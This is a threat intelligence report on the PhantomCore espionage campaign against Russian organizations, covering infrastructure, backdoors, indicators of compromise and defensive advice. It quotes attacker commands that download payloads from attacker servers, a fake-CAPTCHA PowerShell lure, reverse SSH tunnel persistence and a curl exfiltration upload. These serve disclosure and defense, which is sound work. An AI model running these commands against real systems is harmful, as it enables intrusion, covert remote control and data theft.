Phantom pains: a large-scale cyberespionage campaign and a possible split within the PhantomCore APT group

Key characteristics of the PhantomCore activity:

• Extensive malware toolkit: from widely used open-source utilities favored by cybercriminals and updated versions of known in-house tools to previously unseen, custom-built samples
• Segmented infrastructure and tools: a compromised Russian site, a phishing site with a fake CAPTCHA, payload staging servers, MeshCentral servers, SSH tunnels, and a Phantom control panel
• Scale and intensity of cyberattacks: from May to July, more than 180 hosts at Russian organizations in critical economic sectors and government were infected
• Signs of an internal split, with Russian citizens involved in a new offshoot

PhantomCore first came to light in early 2024. Over the past year and a half, the group has significantly expanded its offensive arsenal with custom-developed tools and has carried out numerous espionage-focused attacks against Russian critical infrastructure.

Expertise built by the PT ESC's Threat Intelligence team through in-depth tracking of the group, together with internal cyber intelligence systems, enabled rapid detection of PhantomCore activity despite the evolution of its malware. As a result, in early May of this year we identified a new, large-scale cyberespionage campaign targeting Russian organizations.

We mapped the group's key infrastructure, analyzed its updated toolkit, including previously unknown in-house samples, documented the TTPs and attack kill chain, identified victim organizations in Russia whose corporate networks were compromised, and prevented non-tolerable events.

In early May, PT ESC's Threat Intelligence team detected several UPX packed RAT samples delivered by email as ZIP archives—some password protected—named "Документы_на_рассмотрение" ("Documents for review").

Executing the encapsulated LNK file opened a PDF lure and silently extracted, installed, and launched an updated PhantomRAT backdoor controlled from the C2 server at 195.58.54[.]39.

The associated threat intelligence, enriched with verdicts from Positive Technologies products, was promptly added to the PT Threat Intelligence Portal knowledge base.

Further analysis of the PhantomCore activity enabled the PT ESC's Threat Intelligence team to fully expose the cyberespionage campaign, quickly feed the intelligence into Positive Technologies products to prevent incidents in client networks, and notify other organizations of compromise.

The PhantomCore network infrastructure is strictly segmented by function and by the classes of cyberespionage tools (a detailed breakdown of tools follows in the next section).

1.    C2 server of the PhantomRAT backdoor

Used at the Initial Access stage (first cyberattack stage). Collects basic information about the compromised system and sends commands to infected hosts to download from payload staging servers and run the following payload: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

Detected URL routes:

• /connect: establish connection
• /init: send infected host information
• /check: connection check
• /command: receive a command for execution on the infected host
• /out: return command execution results

Detected server:

195.58.54.39

2.    C2 servers of the PhantomRShell backdoor

Used at the Initial Access stage. Functionality mirrors the PhantomRAT C2 servers: receiving basic information about the compromised system and sending commands to download from payload staging servers and run the following payload on infected hosts: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.

Detected URL routes:

• /poll: send infected host information and receive a command
• /result: send command execution results

Detected servers:

188.127.254.44
91.239.148.21
185.225.17.104

3.    Payload staging servers

Used at the following stages of the cyberattack to host and deliver the following tools to infected hosts:

• PhantomTaskShell backdoor
• PhantomProxyLite backdoor
• PhantomStealer infostealer
• MeshAgent utility
• RSocx utility
• RClone utility
• XenArmor All-In-One Password Recovery Pro utility

The threat intelligence team identified several PhantomCore payload staging servers:

• Compromised site

Used during the Persistence and Defense Evasion stages to host PhantomTaskShell, MeshAgent, and RSocx, which operators of the PhantomRAT and PhantomRShell backdoors load onto infected hosts via a direct URL:
 

up https://<redacted>/inetpub.zip C:\ProgramData\inetpub.zip

up https://<redacted>/update.zip C:\ProgramData\update.zip

up https://<redacted>/hosts.zip C:\ProgramData\hosts.zip

• VPS hub

A VPS server running Ubuntu with SSH enabled; ports 80 (HTTP) and 443 (HTTPS) toggle from closed to open. According to the threat intelligence team, they're typically opened at the start of the workday, when the group pushes payload to infected hosts.

Used at the Credential Access stage to host PhantomStealer and the XenArmor All In One Password Recovery Pro utility and to deliver them to infected hosts via the PhantomTaskShell backdoor using the direct URL:

iwr -Uri "http://188.127.254.234:80/browser.zip" -OutFile "C:\ProgramData\browser.zip"

certutil.exe -urlcache -f http://188.127.254.234/one.zip C:\\ProgramData\\one.zip

Detected server:

188.127.254.234

• Phishing site

Registered on the eve of the identified cyberespionage campaign, in April of this year, using the data of a Russian citizen and the email address iseh34228@proton[.]me.

The site uses the original HTML layout of the official site of the Moscow City Compulsory Medical Insurance Fund and prompts visitors, under the pretext of a fake CAPTCHA challenge, to paste and execute clipboard contents in the Windows command-line interpreter.
 

powershell -WindowStyle Hidden -Command "& {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\dnsclient.exe'; Start-Process '%userprofile%\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}"

Executing the command downloads and covertly launches a MeshAgent instance controlled by the same MeshCentral server at the austolns[.]pw domain as the MeshAgent instance downloaded from the compromised site described above.

Detected phishing site
 

mgfoms.org

4.    PhantomTaskShell C2 servers with the Phantom control panel

VPS servers running Ubuntu with SSH enabled and port 80 (HTTP) open, hosting the Phantom control panel with a web interface for administrator authentication.

The servers are used at all cyberattack stages after Initial Access to manage infected hosts via the PhantomTaskShell backdoor. They expose an external API to receive commands for execution in the victim's PowerShell and to return results.

Detected URL routes:

• /login: authentication
• /api/clients/: register infected host
• /api/clients/<GUID>/commands: receive commands

The favicon is an image alluding to the PhantomCore name, actually a copy of the first letter from the stylized title of a popular computer game, created from a PNG stencil circulating in the gaming community.

These unique network fingerprints allowed us to spot newly deployed servers running the Phantom control panel, confirm their linkage through shared C2 infrastructure (payload staging servers, proxy servers, aggregators of information about infected hosts), significantly broaden our view of the cyberattack footprint and victims, and feed the resulting intelligence into Positive Technologies products.

5.    MeshAgent C2 servers

VPS servers running Ubuntu with MeshCentral (a remote device management platform) installed, as evidenced by TLS certificates on open port 443 (HTTPS).

Used during the Persistence stage to receive data on infected hosts and control them via MeshAgent instances deployed by PhantomRAT and PhantomRShell operators from compromised or phishing sites.

PhantomCore applies a full set of measures to disguise its MeshCentral servers as legitimate IT infrastructure:

• Web authentication pages mimicking corporate Mattermost and Nextcloud services

• MeshCentral server domains mimicking IT and cybersecurity brands

The MeshCentral servers detected by the threat intelligence group use domains themed around cybersecurity and software development:

nextcloud.soft-trust.com
nextcloud.1cbit.dev
nextcloud.trust-sec.it.com
softline-solutions.cloud

Several domains were registered with the real data of a Russian citizen and the email address emilygrace1981@proton[.]me, which is linked to other PhantomCore IT mimicry domains:

polylab.top
techinnovators.world
blockchaineech.world
agrotech.homes
miucroprocessors.world
cybersedcurity.world
reconfiguratifon.world
telecommuunication.world
interoperaebility.world

• Impersonation of real Russian IT companies

On port 81 (HTTP), the MeshCentral servers host a landing page with HTML copied from official sites of Russian IT companies.

Identified MeshCentral domains and servers:

austolns.pw
nextcloud.soft-trust.com
nextcloud.1cbit.dev
nextcloud.trust-sec.it.com
softline-solutions.cloud

194.87.253.233
213.232.204.110
194.116.215.36
46.8.71.104
217.19.4.206
91.239.148.211

6.    Proxy servers of PhantomProxyLite, RSocx, and SSH tunnels

VPS servers running Ubuntu with ports 80 (HTTP), 443 (HTTPS), and 8080 (HTTP) open, with SSH enabled. They are used during the Persistence, Defense Evasion, and Command and Control stages to create a reverse SSH tunnel into a victim's internal network, masquerading as legitimate HTTPS traffic.

Commands to launch the SSH tunnel executed on infected hosts using the PhantomTaskShell backdoor and Windows Task Scheduler:

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@185.130.251.227

schtasks /create /sc DAILY /tn SSH /tr \\"C:\\Windows\\system32\\OpenSSH\\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52213 -p 443 cfyvg84df17842o@185.130.251.227\\" /f /st 09:00

SSH sessions on infected hosts are controlled via a control panel operating on network port 80 of the tunneling servers.

The proxy servers are also used during the Collection and Exfiltration stages as a hub for the RClone utility and the configuration file, which are loaded to infected hosts from the server's 8080 network port using the following commands:

certutil.exe -urlcache -f "http://195.133.32.213:8000/srvhost.exe" "C:\ProgramData\srvhost.exe"

certutil.exe -urlcache -f http://195.133.32.213:8000/wusa.conf C:\ProgramData\wusa.conf

Detected servers:

193.187.174.251
185.130.251.227
195.133.32.213
193.187.174.3
194.116.215.166
185.130.251.219
88.66.89.231
91.219.151.103
91.219.151.59
45.8.228.253
45.158.169.131

7.    Aggregators collecting information on infected hosts

VPS servers running Ubuntu with port 80 (HTTP) open, hosting the backend that collects data on infected hosts. Used during the Discovery stage.

Detected URL routes:

• /upload: uploading information about the infected host

Command to send infected host information, executed in the Windows command interpreter using the PhantomTaskShell backdoor:

C:\\Windows\\System32\\curl.exe -v -F "file=@C:\\ProgramData\\user_report.txt" -F "destinationPath=./user_report.txt" http://185.130.249.224:80/upload'

Detected server:

185.130.249.224

PhantomCore's malicious infrastructure is notable in that nearly half (48%) of its servers are located in Russia, primarily within the networks of three Russian hosting providers:

• LLC Smart Ape: AS56694 (28%)
• Mt Finance LLC: AS214822 (14%)
• First Server Limited: AS204997 (5%)

19% of the Russian infrastructure cluster resides in the 185.130.248.0/22 subnet. The remaining 52% is hosted abroad, distributed fairly evenly across Finland (9%), France (9%), the Netherlands (9%), the U.S. (5%), Germany (5%), Hong Kong (5%), Moldova (5%), and Poland (5%). Notably, 33% of the entire infrastructure is concentrated on the networks of the Canadian provider CGI Global Limited.

• Command and Control

PhantomRAT checks connectivity to the C2 server:

GET /connect

and sends JSON with host details:
 

POST /init

Next, PhantomRAT regularly polls the C2 server for commands to execute on the compromised host:

POST /command

The C2 server replies with JSON containing a Response field, which includes the command type (cmd_id) and the command data (cmd_data) to execute on the host.

PhantomRAT sends command execution results in a similarly structured JSON object:
 

POST /out

The command execution results are returned to the C2 as JSON in the result field. When a command to download a file from a remote host is executed, the result field contains either Download successful:<path> or Download failed, depending on whether the download succeeded:
 

POST /result
User-Agent: YandexCloud/1.0

Detected samples:

ed9b24a77a74cd34c96b30f8de794fe85eb1d9f188f516bd7d6020cc81a86728
4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c61dec8de8f4800fd27e0314
204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
be14fc604c840c3afff9542106c73ed247417de5a56b1e9b2843e7947f0722d9
01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be

Key characteristics:

• Dynamic-link library (DLL) written in C++
• No persistence techniques
• No defense evasion techniques
• Supports multiple action types on the compromised host
• Collects a broad range of host information
• No encryption for data being transferred
• Uses specific User-Agent values
• Hardcoded constant: C:\ProgramData\YandexCloud
• Hardcoded constant: path C:\ProgramData\MicrosoftAppStore
• Impersonates software from Russian IT vendors

3.    PhantomTaskShell

PhantomTaskShell is a PowerShell backdoor used across all post—Initial Access stages of the cyberattack to let operators control infected hosts via the Phantom control panel and to download the following payload: PhantomStealer, OpenSSH, XenArmor All In One Password Recovery Pro, and Rclone.

On first launch, PhantomTaskShell creates update_id.txt on the infected host and writes in it the GUID value generated via the [System.Guid]::NewGuid() function.

For persistence, a Windows Task Scheduler job named SystemAdminAgent_<GUID> that runs PhantomTaskShell for 9,999 days, regardless of power source (battery or AC), is registered on the infected host. On each run, PhantomTaskShell checks for the update_id.txt file containing GUID.

If the update_id.txt file is missing (first run), PhantomTaskShell registers the infected host in the Phantom panel by sending the GUID and the hostname (obtained from the COMPUTERNAME environment variable) to the C2 server:
 

POST /api/clients

Next, PhantomTaskShell polls the Phantom control panel every 60 seconds for commands to execute on the infected host.
 

GET /api/clients/GUID/commands

The C2 server returns a list where each item starts with "Pending:" followed by the command to run on the infected host.

PhantomTaskShell sends the command execution results back to the same URL as JSON.

All PhantomTaskShell actions are logged to update.log on the infected host.

Detected sample:

9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe80c3b0dfc57c6f62d3e4b

4.    PhantomStealer

PhantomStealer is an infostealer written in Go, used during the Credential Access stage. It targets authentication data saved in Yandex Browser, Google Chrome, and Discord. It isn't an open source utility but contains usage instructions.

Run settings:

• program: software to process (Yandex Browser, Google Chrome, or Discord).

Modes of use:

• -c: export authentication data
• -d: import authentication data

In export mode, the infostealer extracts, decrypts, and saves authentication data for each supported software to separate files, then packages them into a single ZIP archive:

• Yandex Browser: yandex-udak64.dat
• Google Chrome: chromecc16.dat
• Discord: discord-key.dat

The import function—unusual for infostealers—likely helps PhantomStealer operators deal with the stolen accounts later.

Detected sample:

c3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6e4915cdf2f899fabf86a4e

5.    PhantomProxyLite

PhantomProxyLite is used at the Persistence and Defense Evasion stages. It sets up an SSH tunnel between the compromised host and the C2 server to maintain reliable access to the victim network.

PhantomProxyLite runs as a background service named SSHService. On first launch, it generates a random reverse port number for the C2 server (greater than 12559), stores it in the Windows registry at HKLM\SOFTWARE\SSHService, and calls it on each start.
In the C:\Windows\Temp directory, a file named config is created with SSH tunneling parameters for routing network traffic to the C2 server.

PhantomProxyLite launches ssh.exe on the infected host with settings from the configuration file and the Windows registry, and establishes a reverse SSH tunnel to the proxy server on port 443, disguising malicious traffic as legitimate HTTPS.

Detected samples:

b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b
2611121e4100b60e8644211bdc831144ba8b772d4d40e616864e7a723a9d7bf8
a2be4d9fdba560a4706ff8c4b32f092ef476f203c96e1b4afaf391cfe82aa533

6.    XenArmor All-In-One Password Recovery Pro

XenArmor All In One Password Recovery Pro is a commercial utility for recovering authentication data in Windows operating systems. The utility is used at the Credential Access stage.

PhantomCore purchased the utility via a privileged Gold-status account registered on July 16, 2024 at netu@tuta[.]com.

Two purchases were made from this account: on July 16, 2024, the 2023 version of the utility, observed at the start of the analyzed cyberespionage campaign; and on May 13, 2025, an updated version, likely intended for use in future cyberattacks in 2025–2026.

7.    RClone

RClone is an open source utility for synchronizing data between a local computer and cloud storage. Used by PhantomCore at the Exfiltration stage to pull data from infected hosts.

The RClone sample identified by the threat intelligence team, downloaded from one of the group's payload staging servers, corresponds to version 1.69.1 of the utility, as confirmed by a hash sum match between the detected sample and the official repository data.

According to the configuration of the detected sample, PhantomCore uses a Mega[.]nz cloud storage account registered to mariaaa228@proton[.]me for data exfiltration.

1. Initial Access

Tools:

• PhantomRAT
• PhantomRShell

Infrastructure:

195.58.54.39
91.239.148.21
188.127.254.44
185.225.17.104

Backdoors are delivered as polyglot files, using, among other methods, hacked email accounts of legitimate Russian companies.

Directories used to store tools:

C:\ProgramData\
C:\ProgramData\YandexCloud
C:\ProgramData\MicrosoftAppStore
C:\Windows\system32\OpenSSH

Tasks in the Windows Task Scheduler

Yandex Update
Microsoft Update
Update
SSH
DNS

Mimicking legitimate files in the tool names

ssh.exe
hosts.exe
inetpub.exe
srvhost.exe

Malicious files:

dnsclient.zip
dnsclient.bat
inetpub.zip
inetpub.exe
hosts.zip
hosts.exe
update.zip
update.ps1
remote.zip
remote.exe
remote.dll
load.zip
load.ps1
one.zip
one.exe
xenallpassword.exe
browser.zip
browser.exe
srvhost.exe
wusa.conf

According to threat intelligence, at the time of publication PhantomCore had obtained access to 181 compromised hosts during its cyberespionage campaign. The first attack occurred on May 12, 2025, and activity peaked in June, with 56% of all infections occurring on June 30. On average, the group stayed in compromised networks for 24 days, with a maximum of 78 days. The group still control 49 hosts.

Before non-tolerable events occurred, the PT ESC's Threat Intelligence team identified and notified victims in the following categories about the incident:

• Government agencies
• Defense sector organizations
• Shipbuilding companies
• Research institutes
• Chemical industry companies
• Mining companies
• Manufacturing companies
• IT companies

All identified victims are Russian organizations.

In mid-April of this year—two weeks before the start of the described campaign—the threat intelligence team discovered a previously unseen reverse shell resembling other tools in PhantomCore's 2024 arsenal.

The new backdoor, dubbed PhantomGoShell, is written in Go, executes commands on a compromised Windows host via the command line interpreter, and shows logic- and code-level similarities to PhantomRAT and PhantomRShell (see the next section for a detailed analysis).

However, several indicators suggested the backdoor was being operated by low-skilled hackers outside PhantomCore's core team who had obtained a raw test tool from its toolkit.

1.    Public sandboxes, errors, not typical persistence and impact

PhantomGoShell operators tested PhantomGoShell using a free account on a public sandbox service, allowing the threat intelligence team to observe the initial setup in real time, including commands and their results.

During the first testing phase of the backdoor, the PhantomGoShell operators struggled with the C2 configuration.

After fixing the C2 server configuration, they executed commands on the infected VM to start the calculator and list running processes and the file system directories.

The PhantomGoShell operators then tested persistence on the infected host by modifying Windows registry keys and silently downloading, installing, and starting the remote administration utilities Remote Desktop Connection and AnyDesk.

After confirming these persistence techniques worked, the PhantomGoShell testers checked whether it was possible to open a large number of audio/video tabs in the browser and assessed memory usage in Windows Task Manager.

Testing was performed only in the evening and nighttime hours (approximately 20:00–02:00 Moscow time) and involved repeatedly restarting public sandbox VMs with new backdoor samples.

2.    Network infrastructure: non-typical URLs and backend

All detected PhantomGoShell samples communicated with a Russia hosted C2 server running Waitress, a Python WSGI server.

Detected URL routes:    

• /<prefix>/connect: establish a connection
• /<prefix>/command: obtain a command to run on the host
• /<prefix>/send_output: send command output

The <prefix> parameter is hardcoded in detected samples.

Detected server:

193.124.117.89

3.    PhantomGoShell: different procedures, reduced functionality

PhantomGoShell is a Go-based backdoor delivered as a PE file.

• Persistence

Upon initial access, PhantomGoShell persists by self-replicating to the user's temporary directory:

C:\Users\<user>\AppData\Local\Temp

and by writing the path to the replicated executable to a Windows registry key while masquerading as the Discord messenger:

HKCU\CurrentVersion\Run\Discord

• Discovery, Command and Control

Via WinAPI calls, PhantomGoShell obtains the hostname, generates a random 16-byte session ID and a session encryption key (key_encryption), and reads a hardcoded prefix.

These parameters are serialized to JSON and sent to the C2 server:

POST /<prefix>/connect

The <prefix> parameter is hardcoded in detected samples.
 

120t9iITNhRIKaVyv54R1DQXRQJiTjHG

After the connection is established, commands and their outputs are exchanged between the C2 server and the infected host in encrypted form. The encryption key is the SHA-256 hash sum of the 16-byte session encryption key (key_encryption) generated during connection setup.

AES256_CBC_Decrypt(SHA256(key_encryption), command)

AES256_CBC_Encrypt(SHA256(key_encryption), command_result)

PhantomGoShell polls for commands to be executed on the infected hosts by sending requests containing the X-Machine-Id HTTP header with the previously generated 16-byte session ID every two seconds.
 

GET /<prefix>/command
X-Machine-Id: ID

The C2 server responds with JSON where the cmd field contains the command to execute on the infected host, encrypted and base64-encoded.

The command is decoded and decrypted.

Decrypted command is executed on the infected host via the command interpreter:
 

cmd /c <расшифрованная команда>

The command output is encrypted, serialized to a JSON object with the output key, and sent with the 16-byte session ID in the X-Machine-Id HTTP header.
 

POST /<prefix>/send_output
X-Machine-Id: ID

Key characteristics:

• Go executable
• Single capability: execute commands via the command line interpreter
• Hostname is the only host information collected
• Implements persistence
• No defense-evasion techniques
• Random 16-byte encryption key
• Encrypted information (AES-256-CBC)
• Random 16-byte session ID
• Session ID transmitted in an HTTP header
• Hardcoded constant: prefix
• Prefix used in URL
• Hardcoded constant: hostname DESKTOP-DEV

4.    Takeaways

Despite some similarities between PhantomGoShell and the PhantomRShell and PhantomRAT backdoors, PT ESC Threat Intelligence analysts assess that different actors are developing and using these tools, even though they share a common technical foundation.

Distinctive traits of PhantomGoShell samples include:

• Simpler functionality
• Different persistence directories
• Different Windows registry keys for persistence
• Different JSON structures
• Different URL route formats
• Code artifacts indicating active development and testing
• Use of HTTP headers to identify compromised hosts
• Encrypted data in transit

At the infrastructure level, PhantomGoShell's infrastructure stands out for its minimal footprint (a single server) and for using Waitress, a Python WSGI server not observed on PhantomRShell/PhantomRAT C2 infrastructure.

Behavioral patterns, timing, and overall activity of PhantomGoShell also differ from PhantomRShell and PhantomRAT operators:

• Testing the backdoor in public sandboxes from free accounts at night
• Configuration issues with the sole C2 server that took several days to resolve
• A short window between discovering PhantomGoShell and the first cyberattacks using the PhantomRShell and PhantomRAT backdoors, insufficient for refactoring or evolution of the tools
• No evidence of PhantomGoShell being used in real attacks or appearing in the group's observed toolkit

Moreover, the threat intelligence team determined that the unusual PhantomGoShell activity traces to Russian-speaking members of gaming Discord communities, some verifiably minors in Russia with limited attack experience, who received the backdoor source code and guidance from a member with a more established cybercriminal background.

We assess this group is a splinter outside the core: low-skilled operators recruited from gaming and Discord communities, organized as a separate cybercriminal "startup" by a PhantomCore core member with access to custom tool source code.

PhantomCore activity has been tracked since early 2024. It targets only Russia's critical infrastructure and is motivated by cyberespionage. The group runs large-scale operations while maintaining strong stealth—remaining invisible in victim networks for extended periods—enabled by continual updates and evolution of in-house offensive tools.

Effective defense against such persistent, sophisticated cyberattacks requires comprehensive solutions that combine established detection expertise with current threat intelligence.

The Positive Technologies Expert Security Center expects PhantomCore to continue posing a high threat to Russian organizations. PT ESC's Threat Intelligence team continues to monitor the APT group's activity, promptly alerts victims to planned cyberattacks, and provides unique threat intelligence to users of Positive Technologies products.

To defend against PhantomCore's attacks, our recommendations are to:

• Use licensed antivirus solutions with up-to-date, regularly refreshed signature databases.
• Scan email attachments from untrusted or suspicious senders with antivirus tools. Be cautious if there's no prior correspondence; the sender isn't a known counterparty; the domain is unusual; or the message stresses urgency, especially while invoking government agencies, regulators, or supervisory bodies.
• Do not open password-protected archives or embedded files without scanning them first.
• Disable hiding of file extensions and verify actual extensions: don't open files whose icon doesn't match the real extension; don't open files with multiple dot-separated extensions at the end of the name.
• Provide regular employee training and exercises on safe email use and resisting social engineering.